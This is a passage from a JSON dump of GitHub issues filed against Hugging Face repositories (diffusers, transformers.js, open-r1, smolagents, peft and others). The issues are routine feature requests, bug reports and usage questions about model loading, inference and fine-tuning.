pipelines", "body": "**Is your feature request related to a problem? Please describe.**\nMissing callback_on_step_end in these pipeline takes away the capability to show the progress in UI\n\n**Describe the solution you'd like.**\nPlease support callback_on_step_end\n\n**Describe alternatives you've considered.**\nN.A.\n\n**Additional context.**\n1. AuraFlowPipeline\nTypeError: AuraFlowPipeline.__call__() got an unexpected keyword argument 'callback_on_step_end'\n\n2. LuminaText2ImgPipeline", "url": "https://github.com/huggingface/diffusers/issues/10672", "state": "closed", "labels": [ "good first issue", "help wanted", "contributions-welcome" ], "created_at": "2025-01-28T16:26:56Z", "updated_at": "2025-02-16T17:28:58Z", "comments": 2, "user": "nitinmukesh" }, { "repo": "huggingface/transformers.js", "number": 1170, "title": "Processing in image encoding for Florence 2", "body": "### Question\n\nHi,\n\nwhile having a look at the code for generation with the Florence 2 model, I've noticed something weird. The original code for inference uses the [_encode_image](https://huggingface.co/microsoft/Florence-2-base-ft/blob/main/modeling_florence2.py#L2599) method for creating image features. However, looking at the [encode_image](https://github.com/huggingface/transformers.js/blob/main/src/models.js#L1861C1-L1874C6) used in `transformers.js`, I've noticed the postprocessing after the model forward pass is missing. Here's a minimal reproducible example:\n\n```python\nimport onnxruntime as ort\n\nfrom transformers import AutoModelForCausalLM, AutoProcessor\nfrom PIL import Image\n\n# The vision encoder was downloaded from:\n# https://huggingface.co/onnx-community/Florence-2-base-ft/resolve/main/onnx/vision_encoder.onnx\nONNX_MODEL_PATH = \"models/onnx/original/vision_encoder.onnx\"\nMODEL_NAME = \"microsoft/Florence-2-base-ft\"\n# Image download link:\n# https://upload.wikimedia.org/wikipedia/en/7/7d/Lenna_%28test_image%29.png\nIMG_PATH = \"lena.png\"\nPROMPT = \"\"\n\nprocessor = AutoProcessor.from_pretrained(\n MODEL_NAME, trust_remote_code=True)\nmodel = AutoModelForCausalLM.from_pretrained(\n MODEL_NAME, trust_remote_code=True)\n\nimage = Image.open(IMG_PATH)\ninputs = processor(text=PROMPT, images=image, return_tensors=\"pt\")\n\nhf_out = model._encode_image(inputs[\"pixel_values\"])\n\nort_vision_tower = ort.InferenceSession(ONNX_MODEL_PATH)\nort_out = ort_vision_tower.run(\n None, {\"pixel_values\": inputs[\"pixel_values\"].numpy()})[0]\n\nprint(hf_out.cpu().detach().numpy())\nprint()\nprint(ort_out)\n```\nThe feature differences are pretty big:\n```\n[[[-0.4047455 0.51958734 -0.23121671 ... 1.0019573 -0.46846968\n 0.5289913 ]\n [-0.08135182 -2.0622678 -0.50597775 ... 0.38061845 -0.7858853\n -1.247189 ]\n [ 0.69417834 -1.926735 -0.691345 ... -0.17574754 -0.98472327\n -1.2420652 ]\n ...\n [ 0.018062 1.2185848 -0.04483193 ... 0.61767036 -0.1832848\n 0.9324351 ]\n [-0.13765828 0.7120823 0.12478658 ... -0.44853052 -0.6390534\n 0.37095645]\n [ 0.58084226 1.6617624 -0.43527135 ... -0.92560166 -0.47037867\n -0.81996024]]]\n\n[[[-0.52661824 0.508744 -0.24130312 ... 0.91191643 -0.39472336\n 1.1632534 ]\n [-0.18091503 -2.2187433 -0.7923498 ... 0.6103708 -0.49637306\n -0.9830185 ]\n [ 0.3002218 -1.9726763 -1.1151179 ... -0.11572987 -0.6870862\n -0.96058726]\n ...\n [-0.08202907 0.8105656 -0.1748765 ... 1.0833437 -0.41167092\n 1.2495995 ]\n [-0.01531404 0.6044417 -0.06392197 ... -0.30775025 -0.5735508\n 0.6775356 ]\n [ 0.74322057 1.4011574 -0.5277405 ... -0.61488384 -0.40253094\n -0.8440974 ]]]\n```\n\nAm I missing something here or is this a potential bug?", "url": "https://github.com/huggingface/transformers.js/issues/1170", "state": "closed", "labels": [ "question" ], "created_at": "2025-01-27T16:13:28Z", "updated_at": "2025-03-02T14:37:52Z", "user": "ir2718" }, { "repo": "huggingface/text-generation-inference", "number": 2956, "title": "How to give custom model code for TGI to run.", "body": "Is there a way to give custom model inference code for TGI to run during invocation? ", "url": "https://github.com/huggingface/text-generation-inference/issues/2956", "state": "open", "labels": [], "created_at": "2025-01-27T10:37:55Z", "updated_at": "2025-01-27T10:37:55Z", "user": "ashwani-bhat" }, { "repo": "huggingface/diffusers", "number": 10662, "title": "Feature Request: Image-to-Image Fine-Tuning Example", "body": "Hello, and thank you for maintaining this amazing repository!\nWhile working with the Diffusers library, I noticed there is a folder containing fine-tuning examples for text-to-image models but not for image-to-image fine-tuning.\n\nSince image-to-image models have many use cases (e.g., style transfer, image restoration, or domain-specific adaptation), a fine-tuning example for this task would greatly benefit the community and improve accessibility for users looking to customize such models.\n\nQuestions:\n\n* Is there any existing implementation or documentation for fine-tuning image-to-image models that I might have missed?\n* If not, is there a specific reason this example hasn't been provided yet (e.g., complexity, low demand)?\nI'd be happy to contribute or collaborate on this feature if it's considered valuable.\n\nThank you in advance for your time and response!", "url": "https://github.com/huggingface/diffusers/issues/10662", "state": "closed", "labels": [], "created_at": "2025-01-27T08:33:39Z", "updated_at": "2025-02-07T08:27:44Z", "comments": 6, "user": "YanivDorGalron" }, { "repo": "huggingface/finetrainers", "number": 248, "title": "How to load full finetune for inference?", "body": "### Feature request / \u529f\u80fd\u5efa\u8bae\n\n![Image](https://github.com/user-attachments/assets/c352bc74-8d56-4090-a46d-3c9a4bdf1a9d)\n\n### Motivation / \u52a8\u673a\n\nIt seems like only lora inference example in README.MD\n\n### Your contribution / \u60a8\u7684\u8d21\u732e\n\ntest the full finetune(LTX-VIDEO,Cogxvideo)", "url": "https://github.com/huggingface/finetrainers/issues/248", "state": "closed", "labels": [], "created_at": "2025-01-27T03:49:57Z", "updated_at": "2025-01-27T06:27:18Z", "user": "BlackTea-c" }, { "repo": "huggingface/Google-Cloud-Containers", "number": 143, "title": "Route to /generate and /metrics", "body": "Hello team, thanks for supporting :)\n\nInside https://github.com/huggingface/text-generation-inference/blob/main/router/src/server.rs file,\n\nthere is a route for google cloud definition as below.\n\n #[cfg(feature = \"google\")]\n {\n tracing::info!(\"Built with `google` feature\");\n tracing::info!(\n \"Environment variables `AIP_PREDICT_ROUTE` and `AIP_HEALTH_ROUTE` will be respected.\"\n );\n if let Ok(env_predict_route) = std::env::var(\"AIP_PREDICT_ROUTE\") {\n app = app.route(&env_predict_route, post(vertex_compatibility));\n }\n if let Ok(env_health_route) = std::env::var(\"AIP_HEALTH_ROUTE\") {\n app = app.route(&env_health_route, get(health));\n }\n }\n\nCurrently, there is no way to access /generate through VAI because if we define AIP_PREDICT_ROUTE outside of container then it creates new path for prediction.\nThe problem is that new features like json generation (https://huggingface.co/docs/text-generation-inference/en/guidance) only supports through /generate path.\n\nCan we change this pattern that if AIP_PREDICT_ROUTE or AIP_HEALTH_ROUTE points existing path, then do nothing ?\n\nThen we can route default VAI predict path to /generate and also expose /metrics path through VAI health path.", "url": "https://github.com/huggingface/Google-Cloud-Containers/issues/143", "state": "closed", "labels": [ "question" ], "created_at": "2025-01-27T02:02:28Z", "updated_at": "2025-01-31T11:44:05Z", "user": "jk1333" }, { "repo": "huggingface/optimum", "number": 2171, "title": "Adding Phi3 support in BetterTransformer (to use the microsoft/phi-4 model)", "body": "### Feature request\n\nHello,\n\nIs it possible to add the phi3 architecture to BetterTransformer supported models?\n\n### Motivation\n\nNan\n\n### Your contribution\n\nNan", "url": "https://github.com/huggingface/optimum/issues/2171", "state": "closed", "labels": [ "Stale" ], "created_at": "2025-01-26T19:10:34Z", "updated_at": "2025-03-04T02:05:22Z", "comments": 2, "user": "majdabd" }, { "repo": "huggingface/transformers.js", "number": 1167, "title": "How to create and use a customized voice in a tts pipeline?", "body": "### Question\n\nHi transformers.js community!\nI am new here and I\u2019d like to ask how to create a new voice and use it inside the current tts pipeline? I just create a next.js project and I can run the text-to-speech model in the tutorial, like following code,\n```\n const synthesizer = await pipeline('text-to-speech', 'Xenova/speecht5_tts', { quantized: false }); \n const speaker_embeddings = 'https://huggingface.co/datasets/Xenova/transformers.js-docs/resolve/main/speaker_embeddings.bin';\n const out = await synthesizer('Hello, my dog is cute', { speaker_embeddings });`\n```\nNow I want to create a new voice and use it in the pipeline, how should I do? Can I realize it in the same environment? (The speaker creation and speech generation are both processed in the next.js web app). I have searched the web but there is no any tutorials or demo on that, looking forward for the answers! \n\nBest!", "url": "https://github.com/huggingface/transformers.js/issues/1167", "state": "open", "labels": [ "question" ], "created_at": "2025-01-26T17:44:57Z", "updated_at": "2025-02-11T02:55:40Z", "user": "gonggqing" }, { "repo": "huggingface/open-r1", "number": 56, "title": "How to supervise non-math data?", "body": "I see the accuracy reward only can check the numerical equal? But what if my question is MCQ and asking an option? \n\nI did a quick check and find it's not working.\n\n```\nfrom math_verify import parse, verify\n\n# Parse the gold and answer\n# If you know that gold will only contain latex or expr (no latex env), use\n# parse(gold, extraction_config=[LatexExtractionConfig()]) or parse(gold, extraction_config=[ExprExtractionConfig()])\n\ngold = parse(\"So the answer is B\")\nanswer = parse(\"B\")\n\nprint(gold)\nprint(answer)\n# Order here is important!\nprint(verify(gold, answer))\n\n\n[]\n[]\nFalse\n```", "url": "https://github.com/huggingface/open-r1/issues/56", "state": "open", "labels": [], "created_at": "2025-01-26T14:30:13Z", "updated_at": "2025-01-26T17:52:58Z", "user": "Luodian" }, { "repo": "huggingface/diffusers", "number": 10655, "title": "How to use custon dataset in train_dreambooth_flux.py.", "body": "Hi. what if i want to train two images with two different prompts. somethink like m1.jpeg , m1.txt ; m2.jpeg, m2.txt.\nthe default example only shows all images share one instant prompt. thanks for the help!", "url": "https://github.com/huggingface/diffusers/issues/10655", "state": "closed", "labels": [], "created_at": "2025-01-26T11:53:01Z", "updated_at": "2025-01-27T19:43:55Z", "user": "rooooc" }, { "repo": "huggingface/open-r1", "number": 46, "title": "how to train on MultiNode MultiGPU", "body": "", "url": "https://github.com/huggingface/open-r1/issues/46", "state": "open", "labels": [], "created_at": "2025-01-26T04:57:11Z", "updated_at": "2025-02-19T14:00:44Z", "user": "yuepengs" }, { "repo": "huggingface/transformers.js", "number": 1166, "title": "Why isn't transformers using filesystem API instead of Cache API?", "body": "### Question\n\nI find the cache API quite limiting when it comes to user experience. I am curious why transformers.js is not utilizing filesystem API. Is there any practical difficulty in it?\n", "url": "https://github.com/huggingface/transformers.js/issues/1166", "state": "open", "labels": [ "question" ], "created_at": "2025-01-25T14:12:38Z", "updated_at": "2025-02-08T12:09:16Z", "user": "Nithur-M" }, { "repo": "huggingface/open-r1", "number": 23, "title": "How to contribute", "body": "Hello there \ud83d\udc4b!\n\nReplicating all parts of DeepSeek's R1 pipeline is going to take a community effort, especially with dataset curation and creation. If you would like to contribute, please explore the issues linked below.", "url": "https://github.com/huggingface/open-r1/issues/23", "state": "open", "labels": [], "created_at": "2025-01-25T13:55:31Z", "updated_at": "2025-05-06T13:32:10Z", "user": "lewtun" }, { "repo": "huggingface/trl", "number": 2642, "title": "How to stop `SFTTrainer` from auto tokenizing my messages ?", "body": "I want to tokenize my text in a custom way in a custom data collator but for some reason i don't know the data keeps being auto tokenized.\nI passed `processing_class=None` to stop this but nothing changed, how can i stop the auto tokenization process ?", "url": "https://github.com/huggingface/trl/issues/2642", "state": "closed", "labels": [ "\u2753 question", "\ud83c\udfcb SFT" ], "created_at": "2025-01-24T02:58:26Z", "updated_at": "2025-02-18T18:59:42Z", "user": "MohamedAliRashad" }, { "repo": "huggingface/diffusers", "number": 10637, "title": "Issues with FlowMatchEulerDiscreteScheduler.set_timesteps()", "body": "### Describe the bug\n\nWhy does `num_inference_steps` have the default `None`? It's not an `Optional`. It cannot be `None`. This leads to weird error messages if you skip this parameter.\nhttps://github.com/huggingface/diffusers/blob/37c9697f5bb8c96b155d24d5e7382d5215677a8f/src/diffusers/schedulers/scheduling_flow_match_euler_discrete.py#L239\n\n`sigmas` is undocumented:\nhttps://github.com/huggingface/diffusers/blob/37c9697f5bb8c96b155d24d5e7382d5215677a8f/src/diffusers/schedulers/scheduling_flow_match_euler_discrete.py#L241\n\n`mu` is undocumented, even though it can be a required parameter (depending on configuration):\nhttps://github.com/huggingface/diffusers/blob/37c9697f5bb8c96b155d24d5e7382d5215677a8f/src/diffusers/schedulers/scheduling_flow_match_euler_discrete.py#L242\n\n### Reproduction\n\nsee above\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nHEAD\n\n### Who can help?\n\n@yiyixuxu ", "url": "https://github.com/huggingface/diffusers/issues/10637", "state": "closed", "labels": [ "bug" ], "created_at": "2025-01-23T20:22:51Z", "updated_at": "2025-02-16T15:29:08Z", "comments": 4, "user": "dxqb" }, { "repo": "huggingface/transformers.js", "number": 1165, "title": "Releasing the Florence 2 ONNX conversion script?", "body": "### Question\n\nHi,\n\nThis might not be the correct place to raise this issue, but I have not found a better option. There have been many requests of people trying to use their tuned Florence 2 models here and in other repos (https://github.com/huggingface/transformers.js/issues/815#issuecomment-2217220254, https://github.com/microsoft/onnxruntime-genai/issues/619, https://github.com/microsoft/onnxruntime/issues/21118, https://huggingface.co/onnx-community/Florence-2-base-ft/discussions/4). @xenova, since you've managed to export these models into ONNX, could you please share the conversion script, even if its just something experimental?", "url": "https://github.com/huggingface/transformers.js/issues/1165", "state": "closed", "labels": [ "question" ], "created_at": "2025-01-23T11:35:05Z", "updated_at": "2025-03-31T10:02:53Z", "user": "ir2718" }, { "repo": "huggingface/transformers", "number": 35853, "title": "How to load a model directly into the GPU memory\uff1f", "body": "I have enough GPU memory, but not enough CPU memory.When I use the \n\"from_pretrained\" function, the program gets killed due to insufficient memory.", "url": "https://github.com/huggingface/transformers/issues/35853", "state": "closed", "labels": [], "created_at": "2025-01-23T09:47:04Z", "updated_at": "2025-01-23T15:19:01Z", "user": "LiBai531" }, { "repo": "huggingface/nanotron", "number": 273, "title": "What is the purpose of \"task\"", "body": "What is the purpose of the \"tasks\" argument in this line?\nhttps://github.com/huggingface/nanotron/blob/9055c664c28a3b430b4e53bfcb5a074068c90f2a/tools/preprocess_data.py#L102C9-L102C28\nThanks", "url": "https://github.com/huggingface/nanotron/issues/273", "state": "open", "labels": [], "created_at": "2025-01-23T09:44:35Z", "updated_at": "2025-02-07T17:09:12Z", "user": "laiviet" }, { "repo": "huggingface/transformers.js", "number": 1164, "title": "`onnxruntime-node` uncompressed too large for NextJS 15 API routes", "body": "### Question\n\nHello! I'm trying to deploy `xenova/bge-small-en-v1.5` locally to embed text in an Next 15 API route, but I'm encountering this error with the route's unzipped max size exceeding 250 MB. Wanted to check in to see if there's some error on my side? Doesn't seem like `onnxruntime-node` should be ~720 MB uncompressed by itself? Thanks!\n\n![Image](https://github.com/user-attachments/assets/2c33f54b-86ab-4c26-8407-aa87223b8d3c)\n\n`generateEmbeddingV2()` below is called within the API route.\n\n```typescript\nimport {\n FeatureExtractionPipeline,\n layer_norm,\n pipeline,\n PreTrainedTokenizer,\n env,\n} from '@huggingface/transformers'\n\nconst MAX_TOKENS = 512\nconst MATRYOSHKA_DIM = 768\n\nlet cachedExtractor: FeatureExtractionPipeline | null = null\nconst getExtractor = async () => {\n if (!cachedExtractor) {\n cachedExtractor = await pipeline(\n 'feature-extraction',\n 'xenova/bge-small-en-v1.5',\n { dtype: 'fp16' }\n )\n }\n return cachedExtractor\n}\n\nconst chunkText = (text: string, tokenizer: PreTrainedTokenizer) => {\n const tokens = tokenizer.encode(text)\n\n const chunks = []\n for (let i = 0; i < tokens.length; i += MAX_TOKENS) {\n const chunk = tokens.slice(i, i + MAX_TOKENS)\n chunks.push(chunk)\n }\n\n return chunks.map((chunk) => tokenizer.decode(chunk))\n}\n\nexport const generateEmbeddingV2 = async (value: string) => {\n const extractor = await getExtractor()\n\n const chunks = chunkText(value, extractor.tokenizer)\n\n let embedding = await extractor(chunk[0], { pooling: 'mean' })\n embedding = layer_norm(embedding, [embedding.dims[1]])\n .slice(null, [0, MATRYOSHKA_DIM])\n .normalize(2, -1)\n\n return embedding.tolist()[0]\n}\n```\n\nI also tried downloading the model file locally, but that didn't work in deployment either.", "url": "https://github.com/huggingface/transformers.js/issues/1164", "state": "open", "labels": [ "question" ], "created_at": "2025-01-23T03:28:16Z", "updated_at": "2025-10-22T20:42:41Z", "user": "raymondhechen" }, { "repo": "huggingface/smolagents", "number": 322, "title": "How to capture CodeAgent's full thinking including the code, not just the final response into a variable", "body": "When we run a CodeAgent in a notebook, it print the question/task, the LLM model used, code (Executing this code, Execution logs) and the Final answer. \n\nThe return value from agent.run contrains only the final response. \n\nI'm working on some demos for which I wanted to run a number of tasks, capture all the output (not just the final answer) and write them to an md or html file, so that I can show everything including the code generated by the agent without running the agents live in the demo. \n\nI tried logging, stdout, from contextlib import redirect_stdout, etc but couldn't capture the full output to a variable. \n\nThanks, \n\n", "url": "https://github.com/huggingface/smolagents/issues/322", "state": "open", "labels": [], "created_at": "2025-01-23T02:50:34Z", "updated_at": "2025-01-23T13:17:49Z", "user": "KannamSridharKumar" }, { "repo": "huggingface/smolagents", "number": 312, "title": "how to exec a bin and use the output as agent arg ?", "body": "hi\na simple exec tool as exec(path,[args]) should be in examples.\nthen an agent call as \"use exec(/bin/ls,/bin)\" put the result in sql db \"(as bin-name) for later use and tell me how much of them are scripts while using sbx -z on each non-scripts\"\nas a short example", "url": "https://github.com/huggingface/smolagents/issues/312", "state": "open", "labels": [], "created_at": "2025-01-22T12:55:22Z", "updated_at": "2025-01-22T12:55:22Z", "user": "malv-c" }, { "repo": "huggingface/datatrove", "number": 326, "title": "How to choose the best timeout value in extractors?", "body": "Hi,\n\nI do not know how to choose the best timeout threshold for running extractor. Shouldn't this threshold be hardware-aware?", "url": "https://github.com/huggingface/datatrove/issues/326", "state": "open", "labels": [], "created_at": "2025-01-22T03:14:58Z", "updated_at": "2025-02-10T09:53:03Z", "user": "jordane95" }, { "repo": "huggingface/datasets", "number": 7377, "title": "Support for sparse arrays with the Arrow Sparse Tensor format?", "body": "### Feature request\n\nAI in biology is becoming a big thing. One thing that would be a huge benefit to the field that Huggingface Datasets doesn't currently have is native support for **sparse arrays**. \n\n\nArrow has support for sparse tensors. \nhttps://arrow.apache.org/docs/format/Other.html#sparse-tensor\n\n\nIt would be a big deal if Hugging Face Datasets supported sparse tensors as a feature type, natively. \n\n\n### Motivation\n\nThis is important for example in the field of transcriptomics (modeling and understanding gene expression), because a large fraction of the genes are not expressed (zero). More generally, in science, sparse arrays are very common, so adding support for them would be very benefitial, it would make just using Hugging Face Dataset objects a lot more straightforward and clean.\n\n\n### Your contribution\n\nWe can discuss this further once the team comments of what they think about the feature, and if there were previous attempts at making it work, and understanding their evaluation of how hard it would be. My intuition is that it should be fairly straightforward, as the Arrow backend already supports it.", "url": "https://github.com/huggingface/datasets/issues/7377", "state": "open", "labels": [ "enhancement" ], "created_at": "2025-01-21T20:14:35Z", "updated_at": "2025-01-30T14:06:45Z", "comments": 1, "user": "JulesGM" }, { "repo": "huggingface/peft", "number": 2339, "title": "Peft version upgrade from 0.4.0 to 0.14.0 results in \"No module named \\u0027peft.utils.config\\u0027\" error", "body": "### System Info\n\nHello,\n\nI'm migrating my sagemaker endpoint from the `huggingface-pytorch-inference:2.1.0-transformers4.37.0-gpu-py310-cu118-ubuntu20.04` image (which is being deprecated) to the `huggingface-pytorch-inference:2.3.0-transformers4.46.1-gpu-py311-cu121-ubuntu20.04-v1.0` image, which is supported.\n\nThis new version does not support the 0.4.0 version of peft, so we have upgraded to 1.14.0 and upgraded to a compatible diffusers version. The sagemaker endpoint deploys correctly with these new versions, but once it's run, we receive the following error:\n\n`No module named \\u0027peft.utils.config\\u0027`\n\nI dug around and found that there' no usage of peft.utils.config in our inference code. The only usage I could find is here, in the peft code itself: https://github.com/huggingface/peft/blob/main/src/peft/config.py. However, in this code, It looks like utils.config does not exist at all.\n\nHere's what I'm currently using:\ndiffusers==0.32.2\npeft==0.14.0\n\nIs the peft library somehow breaking itself by looking for a peft.utils.config that doesn't exist? Have I missed a step that would create the utils.config file? Or is there another hidden dependency using peft.utils.config?\n\n### Who can help?\n\n@BenjaminBossan @sayakpaul \n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nCreate a sagemaker endpoint using the new `huggingface-pytorch-inference:2.3.0-transformers4.46.1-gpu-py311-cu121-ubuntu20.04-v1.0` huggingface DLC image.\n\nUse a requirements.txt that looks like the following:\ndiffusers==0.32.2\npeft==0.14.0\n\nObserve that all requests to the sagemaker endpoint respond with 500 errors.\n\n### Expected behavior\n\nThe Sagemaker endpoint should continue to process requests as it did before the version upgrade (using peft 0.4.0)", "url": "https://github.com/huggingface/peft/issues/2339", "state": "closed", "labels": [], "created_at": "2025-01-21T20:00:07Z", "updated_at": "2025-03-02T15:03:46Z", "comments": 2, "user": "incchar" }, { "repo": "huggingface/smolagents", "number": 298, "title": "How to pass images as input to CodeAgent?", "body": "Hello,\n\nI want to pass an input image along with the prompt to `CodeAgent.run`. I see that there is an `additional_args` argument but when I pass the image as `{\"image\": \"path/to/image.png\"}`, the agent ends up loading the image via pytesseract to read the contents of the image instead of passing it to OpenAI/Anthropic directly. Is there any way that I can ensure that the image is passed along with the prompt so that the model can infer information from it instead of using external libraries to load the image when using the LiteLLM integration?\n\nMy code for reference:\n\n```\nagent = CodeAgent(\n tools=[],\n model=LiteLLMModel(\n model_id=\"openai/gpt-4o\",\n api_key=os.environ.get('OPENAI_API_KEY'),\n temperature=1,\n top_p=0.95,\n ),\n add_base_tools=True,\n additional_authorized_imports=[\"sqlite3\", \"csv\", \"json\", \"os\", \"datetime\", \"requests\", \"pandas\", \"numpy\", \"sys\"],\n max_steps=10,\n)\n\nagent.run(prompt, additional_args={\"image\": \"path/to/image.png\"})\n```", "url": "https://github.com/huggingface/smolagents/issues/298", "state": "closed", "labels": [], "created_at": "2025-01-21T17:14:27Z", "updated_at": "2025-02-18T18:41:27Z", "user": "DarshanDeshpande" }, { "repo": "huggingface/lerobot", "number": 650, "title": "use a camera", "body": "can I use a camera to collect and train?", "url": "https://github.com/huggingface/lerobot/issues/650", "state": "closed", "labels": [ "question" ], "created_at": "2025-01-21T10:35:02Z", "updated_at": "2025-04-07T15:53:26Z", "user": "lwx2024" }, { "repo": "huggingface/transformers", "number": 35807, "title": "How to change data", "body": "\n\nhttps://huggingface.co/facebook/rag-token-nq\n\nfrom transformers import RagTokenizer, RagRetriever, RagTokenForGeneration\n\ntokenizer = RagTokenizer.from_pretrained(\"facebook/rag-token-nq\")\nretriever = RagRetriever.from_pretrained(\"facebook/rag-token-nq\", index_name=\"exact\", use_dummy_dataset=True)\nmodel = RagTokenForGeneration.from_pretrained(\"facebook/rag-token-nq\", retriever=retriever)\n\ninput_dict = tokenizer.prepare_seq2seq_batch(\"who holds the record in 100m freestyle\", return_tensors=\"pt\") \n\ngenerated = model.generate(input_ids=input_dict[\"input_ids\"]) \nprint(tokenizer.batch_decode(generated, skip_special_tokens=True)[0]) \n\n# should give michael phelps => sounds reasonable\n\n\n\nMy attempts\nhttps://github.com/kim90000/Attempts-with-facebook-rag-token-nq/blob/main/README.md", "url": "https://github.com/huggingface/transformers/issues/35807", "state": "closed", "labels": [], "created_at": "2025-01-21T06:17:09Z", "updated_at": "2025-02-28T08:03:38Z", "user": "kim90000" }, { "repo": "huggingface/accelerate", "number": 3356, "title": "how to config accelerate on 2 mac machines", "body": "https://huggingface.co/docs/accelerate/usage_guides/distributed_inference\n\ni use accelerate config and when i run model , it will block and then got an error. means , can not connect IP and port. \n\\\nwho can help me.", "url": "https://github.com/huggingface/accelerate/issues/3356", "state": "closed", "labels": [], "created_at": "2025-01-20T11:35:35Z", "updated_at": "2025-02-25T02:20:41Z", "user": "hsoftxl" }, { "repo": "huggingface/transformers.js", "number": 1160, "title": "How to use sentence-transformers/static-similarity-mrl-multilingual-v1 model?", "body": "### Question\n\nIf I try to use `sentence-transformers/static-similarity-mrl-multilingual-v1` it fails on `tokenizer.json` not found. Is it possible to somehow convert the model to use it ? ONNX runtime is already there.", "url": "https://github.com/huggingface/transformers.js/issues/1160", "state": "open", "labels": [ "question" ], "created_at": "2025-01-19T15:09:18Z", "updated_at": "2025-01-19T17:27:49Z", "user": "michalkvasnicak" }, { "repo": "huggingface/diffusers", "number": 10606, "title": "pred_original_sample in FlowMatchEulerDiscreteScheduler", "body": "Will pred_original_sample be supported in FlowMatchEulerDiscreteScheduler? How to get predicted x_0?", "url": "https://github.com/huggingface/diffusers/issues/10606", "state": "closed", "labels": [], "created_at": "2025-01-19T10:02:22Z", "updated_at": "2025-02-14T12:21:33Z", "comments": 2, "user": "haofanwang" }, { "repo": "huggingface/transformers.js", "number": 1157, "title": "When using StyleTTS/Kokoro for text-to-speech conversion, how can I get the conversion progress?", "body": "### Question\n\nWhen using StyleTTS/Kokoro for text-to-speech conversion, how can I get the conversion progress?\n\n```bash\nnpm i kokoro-js\n```\n\n```typescript\nconst model_id = \"onnx-community/Kokoro-82M-ONNX\";\nconst tts = await KokoroTTS.from_pretrained(model_id, {\n dtype: \"q8\", // Options: \"fp32\", \"fp16\", \"q8\", \"q4\", \"q4f16\"\n});\n\nconst text = \"Life is like a box of chocolates. You never know what you're gonna get.\";\nconst audio = await tts.generate(text, {\n // Use `tts.list_voices()` to list all available voices\n voice: \"af_bella\",\n});\naudio.save(\"audio.wav\");\n```\n\n", "url": "https://github.com/huggingface/transformers.js/issues/1157", "state": "closed", "labels": [ "question" ], "created_at": "2025-01-18T03:36:28Z", "updated_at": "2025-10-13T04:46:59Z", "user": "emojiiii" }, { "repo": "huggingface/transformers.js", "number": 1154, "title": "Text generation pipeline memory spike", "body": "### Question\n\n## Description\nText generation pipeline has a memory spike at the starting point of every generation request from the instance and settle it down after few seconds. we tested this in lower vram and system memory environment it failed to generate anything because of this issue. also it generate nonsensical bunch of tokens if we pass a long context.\n\n### Screenshots\n![Image](https://github.com/user-attachments/assets/5b7c7d34-1d2c-4e3d-a8ec-fa76742171a2)\n\n- Input messages\n```\n[{\nrole: \"system\",\ncontent: \"You are a highly skilled meeting summarizer. Your role is to create comprehensive, well-organized summaries \n of meetings that capture all essential information while maintaining clarity and accessibility. Follow these \n guidelines to generate thorough meeting summaries:\n\nSTRUCTURE AND ORGANIZATION:\n1. Meeting Metadata\n - Date and time of the meeting\n - Duration\n - Meeting type/purpose\n - Attendees (with roles if specified)\n - Location/platform used\n\n2. Executive Summary\n - Brief 2-3 sentence overview capturing the meeting's main purpose and key outcomes\n - Highlight critical decisions or major announcements\n\n3. Detailed Discussion Points\n - Organize by agenda items or natural topic transitions\n - Maintain chronological order within each topic\n - Include for each discussion point:\n * Context and background information\n * Key arguments or perspectives shared\n * Questions raised and answers provided\n * Concerns or challenges mentioned\n * Solutions proposed\n * Related sub-topics that emerged\n\n4. Decisions and Action Items\n - Document all decisions made, including:\n * The final decision\n * Key factors that influenced the decision\n * Any dissenting opinions or concerns noted\n - For each action item, specify:\n * The assigned owner/responsible party\n * Specific deliverables or expected outcomes\n * Deadlines or timeframes\n * Dependencies or prerequisites\n * Resources needed or allocated\n\n5. Follow-up Items\n - Topics deferred to future meetings\n - Scheduled follow-up discussions\n - Required approvals or reviews\n - Outstanding questions requiring research\n\nIMPORTANT GUIDELINES:\n\nLanguage and Tone:\n- Use clear, professional language\n- Maintain objectivity in describing discussions\n- Avoid editorializing or interpreting beyond stated information\n- Use active voice for clarity and direct attribution\n- Include relevant direct quotes when they capture important points precisely\n\nDetail Preservation:\n- Capture nuanced discussions, not just high-level points\n- Document both majority and minority viewpoints\n- Include context for technical terms or project-specific references\n- Note any significant non-verbal elements (demonstrations, whiteboard sessions, etc.)\n- Preserve the rationale behind decisions, not just the outcomes\n\nOrganization Principles:\n- Use consistent formatting for similar types of information\n- Create clear hierarchical relationships between main topics and subtopics\n- Use bullet points and subpoints for complex items\n- Include cross-references when topics are interrelated\n- Maintain clear distinction between facts, opinions, and decisions\n\nQuality Checks:\n- Ensure all agenda items are addressed\n- Verify all action items have clear owners and deadlines\n- Confirm all decisions are documented with their context\n- Check that all participant contributions are fairly represented\n- Validate that no discussion points are orphaned or incomplete\n\nFORMAT SPECIFICATIONS:\n\n# Meeting Summary: Meeting Title\n\n## Meeting Details\n- Date: Date\n- Time: Start Time - End Time\n- Location: Location/Platform\n- Duration: Duration\n- Meeting Type: Type/Purpose\n\n### Attendees\n- Name (Role) - Meeting Lead\n- Names and roles of other attendees\n\n## Executive Summary\n2-3 sentences capturing key outcomes and major decisions\n\n## Key Decisions\n1. Decision 1\n - Context: Brief context\n - Outcome: Final decision\n - Rationale: Key factors\n\n2. Decision 2\n Same structure as above\n\n## Discussion Topics\n\n### 1. Topic 1\n#### Background\nContext and background information\n\n#### Key Points Discussed\n- Main point 1\n * Supporting detail\n * Supporting detail\n- Main point 2\n * Supporting detail\n * Supporting detail\n\n#### Outcomes\n- Specific outcome or conclusion\n- Any decisions made\n\n### 2. Topic 2\nSame structure as Topic 1\n\n## Action Items\n1. Action Item 1\n - Owner: Name\n - Deadline: Date\n - Deliverable: Specific expected outcome\n - Dependencies: Any prerequisites\n\n2. Action Item 2\n Same structure as above\n\n## Follow-up Items\n- Deferred topic 1\n- Scheduled follow-up 1\n- Outstanding question 1\n\n## Additional Notes\nAny important information that doesn't fit in the above categories\n\n\nFINAL VERIFICATION CHECKLIST:\n1. All agenda items addressed\n2. All decisions documented with context\n3. All action items have owners and deadlines\n4. All participant contributions included\n5. All technical terms explained\n6. All follow-up items clearly spe", "url": "https://github.com/huggingface/transformers.js/issues/1154", "state": "open", "labels": [ "question" ], "created_at": "2025-01-17T06:30:06Z", "updated_at": "2025-02-07T03:18:49Z", "user": "ashen007" }, { "repo": "huggingface/datasets", "number": 7372, "title": "Inconsistent Behavior Between `load_dataset` and `load_from_disk` When Loading 